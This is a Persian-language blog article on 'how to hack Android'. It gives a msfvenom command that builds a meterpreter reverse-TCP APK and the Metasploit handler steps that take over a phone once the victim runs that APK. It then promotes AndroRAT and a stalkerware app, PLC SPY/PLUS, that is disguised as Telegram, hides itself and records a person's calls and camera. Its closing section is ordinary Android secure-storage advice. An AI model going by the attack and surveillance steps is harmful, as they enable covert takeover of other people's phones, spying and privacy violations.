معرفی بهترین نرم افزارهای ضبط مکالمه در دنیا
ژوئن 28, 2019بی پارک ، اولین اپلیکیشن رزرو آنلاین جای پارک
جولای 1, 2019هک اندروید را چگونه انجام دهیم ؟ متاسفانه یا خوشبختانه از آنجایی که اندروید یک سیستم عامل متن باز می باشد، امکان هک و نفوذ به آن نیز زیاد است. این سیستم عامل به دلیل متن باز بودن امکانات کاملی را برای توسعه دهندگان برنامه ها و سیستم عامل ها فراهم می آورد. سیستم عامل های متن باز معمولا دسترسی های بیشتری را برای کاربرانشان به وجود می آورند به همین دلیل بیشتر در معرض هک اندروید قرار می گیرد. سیستم عامل اندروید نیز در خطر انواع بدافزارها، ویروس ها و برنامه های هک است که برای آن ساخته اند .
امروز قصد داریم نکاتی را راجع به روش های هک اندروید و راه های نفوذ به این سیستم عامل را بررسی کرده و در اختیار علاقه مندان قرار دهیم.
آنچه در این مقاله خواهید خواند :
هک اندروید چگونه امکان پذیر است ؟
در همین ابتدا، بدون اینکه بخواهیم شما را گیج کنیم، باید بگوییم تمام دستگاهای الکترونیکی قابل هک شدن هستند و دستگاه های اندرویدی نیز از این قاعده مستثنی نیستند. روش های هک اندروید بسیار متنوع و زیاد است تا جایی که حتی افرادی که دانش چندانی در زمینه برنامه نویسی و هک ندارند، باز هم میتوانند گوشی های اندروید را با چند راهکار ساده هک کنند. این دستگاهای اندرویدی مانند اکثر ابزارهای الکترونیکی قابلیت هک شدن را دارند اما روش های هک آن گوناگون بوده و هر کس با توجه به توانایی های خود می تواند یک روش خاص را انتخاب نماید. هر روشی نیز به ابزاری خاص نیازمند است، که این ابزارها میزان دسترسی و کیفیت هک شما را مشخص می کنند.
شاخص ترین روش و ابزاری که یک هکر می تواند برای انجام هک اندروید از آن استفاده کند، یک سیستم کامپیوتری مجهز به سیستم عامل لینوکس می باشد که از نسخه کالی لینوکس یا بکترک استفاده کند. خبر بد برای دارندگان گوشی های اندروید این است که سیستم عامل اندروید نیز بر اساس هسته سیستم عامل لینوکس طراحی شده است و همین عامل سبب می شود پروسه هک اندروید بسیار ساده تر برای یک هکر حرفه ای صورت پذیرد.
هک اندروید با روشهای مختلف لینوکس
برای اینکه بتوان اقدام به هک اندروید کرد باید نسخه کالی لینوکس را روی سیستم خود داشته باشید. پس از آن با استفاده از ترمینال محبوب لینوکس اقدام به فراخوانی برنامه msfvenom می کند. با استفاده از این ابزار، هکر اقدام به ساخت یک برنامه هک اندروید به صورت APK می نماید. برای ساخت چنین ابزاری هکر تنها نیاز دارد که دستور زیر را در محیط ترمینال لینوکس وارد نماید.
<msfvenom -p android/meterpreter/reverse_tcp LHOST=(attacker-ip-address) LPORT=(port-to-receive-connection).<Name.apk<==
در دستور فوق هکر به جای عبارت LHOST می تواند از آدرس آی پی خودش و در قسمت LPORT از پورت اینترنت خودش استفاده کند. Name.apk نام ابزاری است که هکر آن را می سازد تا با آن اقدام به هک اندروید نماید.
سپس با انجام دادن راهکارهای بالا به ترتیب انجام دهید :
- Msf>use exploit/multi/handler
- Msf>set PAYLOAD android/meterpreter/reverse_tcp
- Msf>set LHOST 192.168.1.35
- Msf>set LPORT 443
البته این بار در قسمت LHOST نیاز است که آدرس سرور را وارد کند. این کار با استفاده از دستور ipconfig در محیط ترمینال انجام میشود و شما به خواسته خود رسیده اید.
حالا وقتی که هدف شما بر روی برنامه ای که هکر با عنوان Name.apk ساخته کلیک کند و آن را اجرا کند، عملیات هک با کالی لینوکس موفقیت آمیز انجام می شود. همانطور که می بینید در این روش هک نیاز چندانی به دانش برنامه نویسی نیست و تنها از طریق دنبال کردن یک سری قواعد و دستورات هر شخصی قادر خواهد بود با استفاده از یک سیستم عامل کالی لینوکس اقدام به هک اندروید نماید.
هک اندروید با نرم افزارها
همانطور که گفتیم ابزارهایی که برای هک استفاده می کنید میزان دسترسی و کیفیت عمل هک را تعیین می کند. یکی دیگر از ابزارهایی که بسیار مورد استفاده هکرها به خصوص هکرهایی با سواد کمتر در این زمینه قرار می گیرد، نرم افزارهای هک و نفوذ به اندروید می باشد.
این برنامه ها معمولا توسط هکرهای حرفه ای ساخته می شوند و هکرهای غیرحرفه ای و حتی افراد عادی نیز از آنها برای هک گوشی شخص موردنظرشان استفاده می کنند. تعداد این برنامه ها آنقدر زیاد است که انسان در انتخاب یکی از آن ها ممکن است حتی گیج شود. البته این نرم افزار ها برای اجرا و درست کار کردن نیازمند الزاماتی می باشند که بعضا به سادگی در اختیار همه قرار نمی گیرند. در ادامه مطلب تعدای از نرم افزارهای هک را به اجمال معرفی خواهیم نمود.
هک اندروید با برنامه AndroRAT
یکی از برنامه های معروف و پرطرفدار در این زمینه که تاکنون بسیار موفق عمل نموده است ، برنامه AndroRAT می باشد. نام این نرم افزار مخفف عبارت دسترسی از راه دور به دستگاه اندرویدی می باشد. این برنامه به صورت رایگان در اختیار کاربرانش قرار گرفته است و امکان هک گوشی از راه دور را نیز به آنها می دهد، همچنین با استفاده از این برنامه می توان اقدام به ارسال Sms به وسیله گوشی قربانی نمود. یکی از ویژگی هایی که باعث محبوبیت این برنامه شده است، قابلیت تصویر برداری با استفاده از دوربین گوشی هدف می باشد.
برنامه کنترلی PLC SPY
PLC یکی دیگر از برنامه هایی است که می تواند کار کنترل و هک شخص موردنظر شما را انجام دهد. این برنامه با هدف نظارت بر فرزندان در فضای مجازی توسط سامانه کنترل فرزند طراحی و نوشته شده است.
PLC SPY در دو نسخه بدون دسترسی ( هک با شماره تلفن ) و با دسترسی ارائه می شود. که البته نسخه جدید این برنامه نیز با نام PLC PLUS منتشر شده که شما می توانید آن را با آیکون دلخواهتان مثلا تلگرام بدون فیلترشکن برای فرزندتان ارسال کنید، به محض کلیک فرزند برروی لینک ارسالی شما، برنامه به طور خودکار نصب می شود و سپس از لیست نرم افزارها پنهان می شود. قابلیت های منحصر به فردی که این نسخه ارائه داده است، شنود و ضبط مکالمات فرزند و مشاهده تصاویر اطراف توسط دوربین گوشی فرزند می باشد.
برای دانلود برنامه هک گوشی و یا کسب اطلاعات بیشتر درباره این برنامه می توانید برروی لینک قرمز رنگ زیر کلیک نمایید.
نرم افزار zANTI
بسیاری از نرم افزار ها هستند که به نرم افزارهای هک معروفند اما با هدف انجام تست نفوذ به سیستم طراحی و عرضه می شوند. نرم افزار zanty نیز یکی از این نرم افزارهاست که به کارشناسان امنیت شبکه کمک می کند در سریعترین حالت ممکن اقدام به شناسایی نقاط ضعف شبکه نمایند. این برنامه هک اندروید به برنامه Backtrack گوشی معروف می باشد، چرا که همچون سیستم عامل بک ترک لینوکس، ابزارهای مختلفی را در اختیار کاربران برای انجام عمل هک قرار می دهد و از طرفی قدرت فوق العاده ای نیز دارد.
نکات امنیتی هک اندروید
اندروید دارای ویژگی های امنیتی داخلی است . این سیستم به گونهای طراحی شده است که شما معمولاً میتوانید برنامههای خود را با مجوزهای سیستم و پیش فرض بسازید و از تصمیمگیری در مورد فایلها مطمئن شوید.
ویژگی های امنیتی اصلی زیر به شما کمک می کند تا برنامه های امن بسازید:
Android Application Sandbox که برنامه ها و اجرای کد شما را از سایر برنامه ها جدا می کند. این یک برنامه کاربردی با پیاده سازی قوی از عملکرد امنیتی رایج مانند رمزنگاری، مجوزها و IPC ایمن است.
فناوری هایی مانند ASLR، NX، ProPolice، safe_iop، OpenBSD dlmalloc، OpenBSD calloc و Linux mmap_min_addr برای کاهش خطرات مرتبط با خطاهای مدیریت حافظه در اندروید وجود دارد.
یک سیستم فایل رمزگذاری میشود که میتوان آن را در دستگاههای گمشده یا دزدیده شده فعال کرد.
مجوزهای اعطا شده توسط کاربر برای محدود کردن دسترسی به ویژگی های سیستم و داده های کاربر.
مجوزهای تعریف شده توسط برنامه برای کنترل داده های برنامه بر اساس هر برنامه.
جرا باید با امنیت اندروید آشنا باشیم؟
مهم است که با بهترین روش های امنیتی اندروید در این سند آشنا باشید. چه بخواهید اندروید را هک کنید و چه بخواهید از هک اندروید جلوگیری کنید باید با امنیت اندروید بیشتر آشنا باشید. دقت داشته باشید که مواردی که به شما گفته می شود را می توانید به صورت پیش فرض فعال شده ببینید. بسیاری دیگر از ویژگی های امنیتی را می توانید در بخش تنظیمات پیگیری کنید. یکی از موارد مهمی که باید به آن توجه کنید نحوه ذخیره داده هاست که در یر به شما توضیح داده شده.
ذخیره داده ها
رایج ترین نگرانی امنیتی برای یک برنامه در Android این است که آیا داده هایی که در دستگاه ذخیره می کنید برای سایر برنامه ها قابل دسترسی است یا خیر. سه راه اساسی برای ذخیره داده ها در دستگاه وجود دارد:
- حافظه داخلی.
- ذخیره سازی خارجی
- ارائه دهندگان محتوا.
از حافظه داخلی استفاده کنید
به طور پیشفرض، فایلهایی که در حافظه داخلی ایجاد میکنید فقط برای برنامه شما قابل دسترسی هستند. اندروید این حفاظت را اجرا می کند و برای اکثر برنامه ها کافی است.
از حافظه خارجی استفاده کنید
فایلهای ایجاد شده در حافظه خارجی، مانند کارتهای SD، در سطح جهانی قابل خواندن و نوشتن هستند. از آنجا که حافظه خارجی می تواند توسط کاربر حذف شود و همچنین توسط هر برنامه ای اصلاح شود، اطلاعات حساس را با استفاده از حافظه خارجی ذخیره نکنید.
از ارائه دهندگان محتوا استفاده کنید
ارائه دهندگان محتوا یک مکانیسم ذخیره سازی ساختار یافته ارائه می دهند که می تواند به برنامه شخصی شما محدود شود یا برای دسترسی به سایر برنامه ها صادر شود. اگر قصد ندارید به برنامه های دیگر دسترسی به ContentProvider خود ارائه دهید، آنها را به عنوان android:exported=false در مانیفست برنامه علامت بزنید. در غیر این صورت، ویژگی android:exported را روی true تنظیم کنید تا به سایر برنامهها اجازه دسترسی به دادههای ذخیرهشده را بدهید.